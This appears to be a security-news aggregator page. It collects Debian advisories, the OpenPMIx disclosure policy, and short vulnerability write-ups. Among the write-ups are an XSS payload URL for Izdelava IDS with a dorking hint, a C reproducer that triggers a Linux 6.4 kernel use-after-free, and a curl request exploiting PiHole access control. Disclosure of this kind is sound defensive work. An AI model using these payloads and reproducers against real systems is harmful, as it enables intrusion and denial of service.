Debian Linux Security Advisory 5943-1 - Two security issues have been discovered in the Open VMware Tools, which may result in a man-in-the-middle attack or authentication bypass.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5493-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
September 10, 2023                    https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : open-vm-tools  
CVE ID         : CVE-2023-20867 CVE-2023-20900  
Debian Bug     : 1050970

Two security issues have been discovered in the Open VMware Tools, which  
may result in a man-in-the-middle attack or authentication bypass.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2:11.2.5-2+deb11u2.

For the stable distribution (bookworm), these problems have been fixed in  
version 2:12.2.0-1+deb12u1.

We recommend that you upgrade your open-vm-tools packages.

For the detailed security status of open-vm-tools please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/open-vm-tools

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmT+AygACgkQEMKTtsN8  
TjbAdQ/+M8tP/Dv5EOKhkUxZPD2NzBajQdr4iBJa2ZEhnhL3plaon0YNlnKcbItv  
tS1S/u3Gp33TgJ6LfpRyQ18x2/5qloPcxVER5I5j4mkkHrdPKgzx+1dirRuz5oBJ  
5FwQXWZoH3KJ6pGIc0EcNSrAEKgOqr0ISHAQ8LztXD3Oe6mtm6oxqmf24iYUmDwH  
MkAXihLOqETkz0Y0Cmn5QGUq7nUvV+at6zij+Su5fSyyyMo0WW9LZrGfNzL9t3QT  
rRl9VS/p8DRYIk6VBaF8foY1e7WfDXtiZXAVtAd53FFrSVPFlQWI9WETIDQqEGe6  
m1isNBK+kCOKCKiceLRMvX+2qUy/KKJqyRYN/VZTMqxDDVZIuY6C0kJLaZ6P5png  
svwDF0PISIq77AM/S4bw5wKbIT8qNj8BCsrkRXeXFteoTtvygAr3rnWgv3nmLY9c  
XFXIBtDhs0TS/C4ZPAhZGqAf5AJ9AN636Wie5pmUxqjnf6ecGORKfiaT5GV0URjC  
324IxAHh6ml0JcVKsUczxP7YjPlEP0LZ90tiUXYgLxQgBouTrBqOD1VdcNtZbvkz  
EYU3YDTCG7GNE3mod8COJV2ZdSAgi1V1by7j6gFDwSQrfkqUke5yLlYayQp90WPC  
oXGRR8ygOrTtRw70WQfVgWBqss0Ix1J0qnuIjrIZzhvkc8KGYeY=  
=+jTU  
-----END PGP SIGNATURE-----

Debian Security Advisory 5943-1

OpenPMIx PMIx before 4.2.6 and 5.0.x before 5.0.1 allows attackers to obtain ownership of arbitrary files via a race condition during execution of library code with UID 0.

Historically, PMIx has operated as a library at the user level in relatively controlled environments (i.e., the typical high-performance computing cluster embedded in a protected network, and thus not exposed to the general Internet). This situation has changed, however, as system management stack packages and other software operating at privileged levels have begun to operate PMIx servers. Increasingly, the PMIx library finds itself in situations where its communications are between entities at different privilege levels (e.g., between root and user) and operating on head nodes with direct connection to more exposed networks.

The PMIx community takes security associated with use of its library seriously, recognizing that our ability to respond to concerns is bound by our limited access to volunteer resources. We deeply appreciate coordinated efforts done in partnership with our reporters as these have the highest probability for a successful and satisfactory resolution. Reports that simply state something is wrong while providing no assistance in triaging the problem or developing the solution will be treated seriously, but with correspondingly longer response times.

PMIx does not have formal, contractual relationships with its users. Instead, we have informal relationships with downstream packagers (e.g., Debian, Fedora, SUSE), resource managers (e.g., Slurm, PBS, PALS), and libraries (e.g., Open MPI, MPICH, OpenSHMEM, PGAS). This quite frequently takes the form of individuals as opposed to organizational contacts. Thus, it isn’t possible for the PMIx community to offer any guarantees as to the breadth or immediacy of notification for security issues. We can only do our best to alert the people we know about, and hope that they spread the word as required.

Our vulnerability disclosure process reflects this situation. While we strongly encourage discoverers to report potential security issues to us and follow our process, we will respect their wishes and work with them in cases where their preferred process may vary.

NOTE: any potential security issue should be reported immediately to us at security@pmix.org

**14.1. Vulnerability Disclosure Process**

This process covers security issues pertaining to the PMIx library itself. Issues with closely related components — such as libevent, HWLOC, MUNGE or third-party plugins — may be raised with us and we will work with the reporter to identify the appropriate contacts and coordinate disclosure.

The PMIx Vulnerability Disclosure Process consists of several distinct, but possibly overlapping steps:

1.  Problem identification and initial triage.
    
    The problem is reported to the community and a first-level triage performed. Primary focus here is on scoping the extent of the issue so it can properly be communicated (both in terms of severity and complexity to address) to the rest of the community.
    
2.  Notification and embargo
    
    Once the problem has been triaged, it will be communicated to the known consumers of the PMIx library (as noted above). This will be done in a private manner and all informed will be asked to maintain that privacy during the embargo period. The purpose of this step is to ensure the timely notification of the problem without alerting potential bad players as to the vulnerability, thus giving the community time to respond to the problem. The community will use this period to assemble a team to address the problem.
    
    The embargo period is expected to continue during the entire time work is being performed towards a resolution of the problem. The PMIx community, of course, has no control over the actions of its members or users, and therefore cannot guarantee confidentiality throughout the resolution process. However, the community will request best efforts from all involved due to the shared interest.
    
3.  Private release
    
    Once a solution to the problem has been devised, a new release of the library will be made that includes the fix. This will first be made available to the known consumers of the library, as well as the initial reporter if not a member of that list. A reasonable amount of time will be provided (as defined by general discussion across the involved parties) for rollout to occur through the participants. The embargo on public discussion will be maintained throughout this step.
    
4.  General release
    
    At this point, the embargo will be lifted and a general announcement (including email to the PMIx mailing lists) of the problem and availability of the solution will be made. All users will be urged to update as quickly as possible. All vulnerable releases will be removed from the GitHub release pages, though the tags corresponding to those releases will be retained for historical purposes.
    

**14.2. Software Authenticity and Integrity**

Authenticity and integrity of PMIx software should always be confirmed by computing the checksum of the archive and comparing it with the value listed on the GitHub release page. Assuming you downloaded the file pmix-4.2.2.tar.bz2, you can run the sha1sum command like this:

shell$ sha1sum pmix-4.2.2.tar.bz2

Check that the output matches what is printed in the release announcement, which may look like this:

b4e1cb79dfd94c1b9db8eaba02f725c07ef9df2b  pmix-4.2.2.tar.bz2

To avoid having to manually compare the string, you may use the sha1sum -c parameter as follows:

echo 'b4e1cb79dfd94c1b9db8eaba02f725c07ef9df2b  pmix-4.2.2.tar.bz2'|sha1sum \-c

CVE-2023-41915: 14. OpenPMIx Security Policy — OpenPMIx latest documentation

Debian Linux Security Advisory 5491-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5491-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffSeptember 07, 2023                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-4761 CVE-2023-4762 CVE-2023-4763 CVE-2023-4764Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 116.0.5845.180-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 116.0.5845.180-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmT6DCoACgkQEMKTtsN8TjZj4g//RO4rAcJZYRRBGN+T3PnG10PrE8GMM3kdteUkPz6UbVHoO2MLS2JJ6DvyujUogqtg17utwkPYDmJhXuyd4C5IaM7NM2KOcfSgiQ0roEA1G01lqVT8B6tf6WzQYUKqGepU/c18cbsDsZx5heHEBB/hkS79HBOcyVhPvRHKldYS9NDXY4HbaXedOrwqgGmchV+i4ydxeZqzr8q9LmIAl2fX1vNrh8xZj8PC2eYBsTci5gnBZWnNbzqTnISL84CD4UhWeYgA6GvYEr+KEwFWqnM1aD0qqU5MbiKWeF3Gsz2Lbyu5QWFQQkDU4ewpfK73pMamCOeNDId19olP4hgXP/Oihr/gRyNm3TOzgODuQUJfwhaGUGHv/I5R1ddVvoGRY9j7j7JhqEyn7IHdeJTKiFjAFfuMzuo+a2No9470bSRh97G7HTSNrekHR73xH7qfm5IvG1NAPWiMmXv/vDD2uckg7rpFZ0ifNjpMrgLSB+z1w5BZECQ5k9R1dKg78cO8+HaEnPoArYyQ/BAIB4Fl/VJQAXVteB7AR73saMIrz2OMh5OjbJzydQoT3yrlX1qr85MS/EZTqUXpOQJXcteGNllELOOAQxDxUr9RDO6oH/5EUUXcITsw+QF9x8KpzUeu8CywCCgMlLVYYTQbPmzWhdiEm5AmyzBud3YP9u3KF3RXmkw==PtxI-----END PGP SIGNATURE-----

Debian Security Advisory 5491-1

Izdelava IDS version 2.0 suffers from a cross site scripting vulnerability.

**Izdelava IDS 2.0 Cross Site Scripting**

Posted Sep 7, 2023

Authored by indoushka

Izdelava IDS version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 0ef798585da30c6f8445d7bd8186a6b3603ee0ca8ce5383bd27b385d754bf05c

Download | Favorite | View

**Izdelava IDS 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Izdelava IDS v2.0 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://studiointera.net                                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /preview.php?id=9'<script>alert(/indoushka/);</script>[+] http://127.0.0.1/gspostojnanet/vnosi/cms/preview.php?id=9%27%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,139)
*   Arbitrary (16,235)
*   BBS (2,859)
*   Bypass (1,743)
*   CGI (1,027)
*   Code Execution (7,289)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,499)
*   Encryption (2,370)
*   Exploit (52,056)
*   File Inclusion (4,227)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,791)
*   Intrusion Detection (892)
*   Java (3,049)
*   JavaScript (859)
*   Kernel (6,717)
*   Local (14,491)
*   Magazine (586)
*   Overflow (12,701)
*   Perl (1,423)
*   PHP (5,152)
*   Proof of Concept (2,343)
*   Protocol (3,604)
*   Python (1,535)
*   Remote (30,843)
*   Root (3,588)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,893)
*   Shell (3,192)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,208)
*   SQL Injection (16,403)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,811)
*   Web (9,691)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,988)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (372)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,828)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,638)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,823)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,885)
*   UNIX (9,305)
*   UnixWare (186)
*   Windows (6,582)
*   Other

Izdelava IDS 2.0 Cross Site Scripting

Debian Linux Security Advisory 5490-1 - Multiple security vulnerabilities have been discovered in aom, the AV1 Video Codec Library. Buffer overflows, use-after-free and NULL pointer dereferences may cause a denial of service or other unspecified impact if a malformed multimedia file is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5490-1                   security@debian.orghttps://www.debian.org/security/                          Markus KoschanySeptember 06, 2023                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : aomCVE ID         : CVE-2020-36130 CVE-2020-36131 CVE-2020-36133 CVE-2020-36135                 CVE-2021-30473 CVE-2021-30474 CVE-2021-30475Multiple security vulnerabilities have been discovered in aom, the AV1 VideoCodec Library. Buffer overflows, use-after-free and NULL pointer dereferencesmay cause a denial of service or other unspecified impact if a malformedmultimedia file is processed.For the oldstable distribution (bullseye), these problems have been fixedin version 1.0.0.errata1-3+deb11u1.We recommend that you upgrade your aom packages.For the detailed security status of aom please refer toits security tracker page at:https://security-tracker.debian.org/tracker/aomFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmT3rHBfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFDRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7UeSTUw//f5aA9QXBT7ro8HZITTZFs0LH6PAc12iyc3ajZDldlKnapdt3d/QmtNyPw/Xv+rG1gY/1/VJg0Id6mEXqpMuuDHQvv3db7QeAn2P/JWK+qnS7o/rxJdtqbtgkuiDQ79AbmCNG6Km7J5pZuvzW7zY5QKcLEwpG0Xzjn+Uf0prtw1nLQU8sVs/MWLFzWxIym8+QT+xwrjj5j5wfXzhmMQJxKLVhn12zV0ZHYJ6RR3eKDKCJNpTkYia+OdQF573X50sStBUrs8DBguRemWfkOdaBnqcDscFX0ody+UWwQ4a7b2PlN8U4cyhEQ92BgEL57afIo9nrIYT4hHKjEWzYKN/O/NGm3bDol2xFlJkiXQvpildPMPNVChpnqudPVz9A78qJDtyJ6P0/VTeLjhB8uJcSMZUoLNXzH4XwObd1uAHow8/tHl32WK+1CdVie1qfCpKscDEL7O+Mn315K3xu6WfQ+volXlsPn+NbDtRsNvnSvbTbEvhBWByr8VpCOG+oMdoHvzqL+4aIA1lL7aioLCBNYH2F4ZQX7DabnLfcpbWWHXqswNAlv5UL+McmDA84RJgGycQS77gbvTsPvYYw+iuGNDVHiI+jtIsAROqwmmwtOXNb61GZLe8JpokAkZClfhja3DOxZE+LaPWPFECxmHlIQRf1Q81h5whD97WNDSgYz8E==vlUG-----END PGP SIGNATURE-----

Debian Security Advisory 5490-1

Debian Linux Security Advisory 5489-1 - A buffer overflow was found in file, a file type classification tool, which may result in denial of service if a specially crafted file is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5489-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoSeptember 04, 2023                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : fileCVE ID         : CVE-2022-48554A buffer overflow was found in file, a file type classification tool,which may result in denial of service if a specially crafted file isprocessed.For the oldstable distribution (bullseye), this problem has been fixedin version 1:5.39-3+deb11u1.We recommend that you upgrade your file packages.For the detailed security status of file please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/fileFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmT2NDVfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TNFg/+PpsDJJwxstMnU847dp8aR25v62Bboy3FRLrr16gbJozitu/uzsD9pdj7avI/WcpFaM2Y9in9odYhSccvgWcloq5o/MSm7IMplAm18O3D+m5pFdZw5GSIQKch3ZRl5F/37P6Kd2UQPXJoMhAUpNdL3LAjRjhfWji3LiWhNky+bOXLF3/TtPjhZutcffVoQ8Jvjd0U169i4s0i8lomMFs5AErReatFWbpRtWsGN1FYOUXpNa17n+sUwNaneWkthap+bkCINhFTzFCsiEd+QniY1Pyj8/V5EkWMYJzPPWLe0s93t2ORAGlMRmDzzCVEhtHWqOUz592DH9TqjJ8YeQtNd1o2KvTwYGWv63PN8ksoirFHYPqNj/hh6L4UuPc23tmNGtN7ErZnP45Z1SmSzAXVmm+YJjIjxO2qt2rg/DzdXXR8q/hR9FzYvlMQv058HQ67Vl1ua5d+66T8L7YgmJMoj6qDCJwmpRetfRPqOwucptPDlvRIYn23xSDQBkYFIbIPzoyvll+HYfhbkuvwa8hisK9PJfS5wEfU3Isp4CpKXhMkwNPgZyYFLqHt45Vbu1ROAy10Wwu18Lk+Vl9quUz5J0h3Go7Xuvk3xRx6NJPxRKiBGrqYhWcVw+bHgSn5oQCy0aNh4vzJy3bD8ZbQmXxiX/ytzN2TokgXBiIW6b3zGkM==kuBK-----END PGP SIGNATURE-----

Debian Security Advisory 5489-1

Debian Linux Security Advisory 5488-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5488-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
September 03, 2023                    https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2023-4573 CVE-2023-4574 CVE-2023-4575 CVE-2023-4581  
                 CVE-2023-4584

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:102.15.0-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:102.15.0-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmT0cUsACgkQEMKTtsN8  
TjZyyg//amaTOqpvk6JD06P7vQkQoQ5fLFlu9QsLU0ziz4Xu+PRihErytIO8KKBu  
wqCTihgptvvxuAUEEjniQXU4LVRBoN9KnlOvDYxl4iIhNT0qiPBqccnGr4NE/WMI  
GXQKDDmbis9A9UimmPtNk8HXjtXAgEvqQY/ni73cWhPtmvAoKzcel6J0l4qMQBxG  
zR57rxNmizxNNqITloRRvWs8aNuKCj47lGlLLsoHjp1mqyCBR6RYr1+HBCLUXsuy  
8aVhqcVh7NrbrKu69UjAdCyHUb0h4U7mjjJwWDzUFi8LOWPsNu3seXHgL2U0LaqP  
+s2FxOI7N8augXx+lc4wArn692xxu6//QWCclQupYVcRDQOOdBs2BjElGKvD4VNL  
w3kj1cqMaaCEARaRrgKrx0szCQgy2ibtDgZ9RdaC2kc0xDdlTGopP3bBjjt1S4u6  
hvgJldUz8HdmOwcr6xQAj7bUpDXc7B7xeKWzZKE1rFksz76yF/eCDo+0vANy2vhd  
5q+ub2lziPwiF8IoCs26uKfYbTNI6SNwahHmY1nHLRxPHPqsitTG4ftBxJ8E4CN/  
pIX+rWAbNa/Er3XQeefVOASvWL2Nf/vOhtGsqiVopd2dGhv4vh2oY9w28YvIM786  
SlRceaM+7RGXXPPzWYxNWLTbIIkX/x8Gn8UCz+Wus9udIOIrbyU=/dxn  
-----END PGP SIGNATURE-----

Debian Security Advisory 5488-1

There is a race between mbind() and VMA-locked page faults in the Linux 6.4 kernel, leading to a use-after-free condition.

    Linux 6.4: UAF race between mbind() and VMA-locked page fault(tested on git master, at commit 57012c57536f)Summary:There's a race between mbind() and VMA-locked page faults, leading to UAF.You can quickly hit this with a straightforward reproducer that just keeps calling mbind() on one thread and causing page faults on another thread.I'll send a suggested patch in a minute.mbind() replaces vma->vm_policy while only protected by mmap_write_lock(), which can involve freeing the old vma->vm_policy:sys_mbind  kernel_mbind    do_mbind      mmap_write_lock      mbind_range [for each vma in range]        vma_replace_policy          new = mpol_dup(...)          old = vma->vm_policy          vma->vm_policy = new          mpol_put(old)      mmap_write_unlockVMA-locked page fault handling can allocate pages, which requires using the vma->vm_policy:do_user_addr_fault  lock_vma_under_rcu  handle_mm_fault    __handle_mm_fault      handle_pte_fault         do_pte_missing           do_anonymous_page             vma_alloc_zeroed_movable_folio               vma_alloc_folio                 get_vma_policy                   __get_vma_policy                     pol = vma->vm_policy    ***race***                     mpol_get(pol) [conditional on MPOL_F_SHARED]                 [do page allocation]                 mpol_cond_put(pol)  vma_end_readBecause of the mpol_cond_put(pol) call, it should be possible for this to manifest as a UAF write.You can hit this race on a kernel with CONFIG_NUMA and CONFIG_KASAN very quickly (less than a second, I think) with this reproducer - you don't need an actual NUMA system for this, I've tested it in a QEMU VM without NUMA:==============// gcc -pthread -o mbind-vs-pf mbind-vs-pf.c -Wall#define _GNU_SOURCE#include <pthread.h>#include <err.h>#include <unistd.h>#include <sys/syscall.h>#include <sys/mman.h>#include <linux/mempolicy.h>#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1L) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})static char *vma;static void *fault_thread(void *arg) {  while (1) {    // fault in...    *vma = 1;    // ... and zero the PTE again with zap_page_range_single()    SYSCHK(madvise(vma, 0x1000, MADV_DONTNEED));  }}static void mbind_vma(unsigned long policy) {  unsigned long nmask = (1UL << 0);  SYSCHK(syscall(__NR_mbind, vma, 0x1000, policy|0, &nmask, sizeof(nmask)*8+1, 0));}int main(void) {  vma = SYSCHK(mmap((void*)0x100000, 0x1000,        PROT_READ|PROT_WRITE|PROT_EXEC,        MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0));  pthread_t thread;  if (pthread_create(&thread, NULL, fault_thread, NULL))    errx(1, \"pthread_create\");  while (1) {    mbind_vma(MPOL_BIND);    mbind_vma(MPOL_INTERLEAVE);  }}==============This will give the following splat:==================================================================BUG: KASAN: slab-use-after-free in vma_alloc_folio+0x93/0x220Read of size 2 at addr ffff888007c0e6f6 by task mbind-vs-pf/556CPU: 3 PID: 556 Comm: mbind-vs-pf Not tainted 6.5.0-rc3-00123-g57012c57536f #304Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014Call Trace: <TASK> dump_stack_lvl+0x36/0x50 print_report+0xcf/0x660[...] kasan_report+0xc7/0x100[...] vma_alloc_folio+0x93/0x220 __handle_mm_fault+0x71b/0x1060[...] handle_mm_fault+0xbe/0x280 do_user_addr_fault+0x196/0x630 exc_page_fault+0x5c/0xc0 asm_exc_page_fault+0x26/0x30[...] </TASK>Allocated by task 555: kasan_save_stack+0x33/0x60 kasan_set_track+0x25/0x30 __kasan_slab_alloc+0x6e/0x70 kmem_cache_alloc+0xf5/0x260 __mpol_dup+0x72/0x1c0 vma_replace_policy+0x20/0xb0 do_mbind+0x379/0x510 kernel_mbind+0x11a/0x130 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x6e/0xd8Freed by task 555: kasan_save_stack+0x33/0x60 kasan_set_track+0x25/0x30 kasan_save_free_info+0x2b/0x50 __kasan_slab_free+0x10a/0x180 kmem_cache_free+0xaa/0x380 vma_replace_policy+0x87/0xb0 do_mbind+0x379/0x510 kernel_mbind+0x11a/0x130 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x6e/0xd8[...]==================================================================If I leave the reproducer running some more, I get other crashes, like in the KASAN internals, that suggest that the reproducer is already causing memory corruption.In case you're curious: I found this by grepping for mmap_write_lock*() calls and looking at most of them to figure out if they do anything interesting to VMAs without taking VMA locks.This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2023-10-26.Found by: jannh@google.com

Linux 6.4 Use-After-Free / Race Condition

AdminTLE PiHole versions prior to 5.18 suffer from a broken access control vulnerability.

    # Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control# Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554)# Date: 21.12.2022# Exploit Author: kv1to# Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17# Tested on: Raspbian / Debian# Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497# CVE : CVE-2022-23513In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint.## Proof Of Concept with curl:curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>'## HTTP requestsGET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' HTTP/1.1HOST: pi.holeCookie: [..SNIPPED..][..SNIPPED..]## HTTP ResponseHTTP/1.1 200 OK[..SNIPPED..]data: Match found in [..SNIPPED..]data: <domain>data: <domain>data: <domain>

AdminLTE PiHole Broken Access Control

Debian Linux Security Advisory 5487-1 - A security issue was discovered in Chromium, which could result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5487-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 31, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-4572Debian Bug     : 1024981A security issue was discovered in Chromium, which could result in theexecution of arbitrary code.For the oldstable distribution (bullseye), this problem has been fixedin version 116.0.5845.140-1~deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 116.0.5845.140-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTw5XQACgkQEMKTtsN8TjY4RQ//b6+fDtZKSmdGZi9IFFjHnEa3/qG2C6KcR13vwLJRysGoiFhu0B+58s2UU10Gdbo1/Qx6E5qwO0WaUHnlm2q56E8xt/MZ1C44lrI2/QByjnljX/BznbVu5IOmesgLz6Slf+L8goykVug6OW0cZpe5yiXL7Cg6qM9+K3e+7kIiif4DylYnOSHNZ4JprQE01W/6JziWeqcYEPpR4LoqhzRFQZQXRNdgKZWfy33dRmt+qWFE7eGpmLDltKcLe4A6iti3VxG5Ktn/fD84i41sjr4vM1PHrvuPwp1btLsgmbbZiElTBjpb6csAfOU/woGiwX7ak3iUW1l0sqoh2ksanmEZesvTpfBQ9BsfO8NrBmsJhmGNN+N8o5xroYFKhlt6+Xc9R7iRYBZxHQuohUjojKK0Nebh8QLL6oW+aMgxq4pVyDE3qwf7Rsd+V6Biq57Yq2MjLlzO7+y/VXs6fUyqjo/pKbgZADDXTYGzcq23eMJX15vvueeFLTR1ZasAwj9E2qgLl70+vecDLHpFXx2YBK2JYqUS1dZUHXQMr7PigOxFkF2U94bnhll/emcGgP7qpaPgC7KEjk8MPF+q3jLezSdzUdMLfUmUN9NR7a14euSr8blXSaZg30KPz6gVyvrUBpF6g1zJlDtcS2IYTkk2FtwzR2RpDgtFh5YZl/pnZ+VFrKE==LVjS-----END PGP SIGNATURE-----

Tag

#debian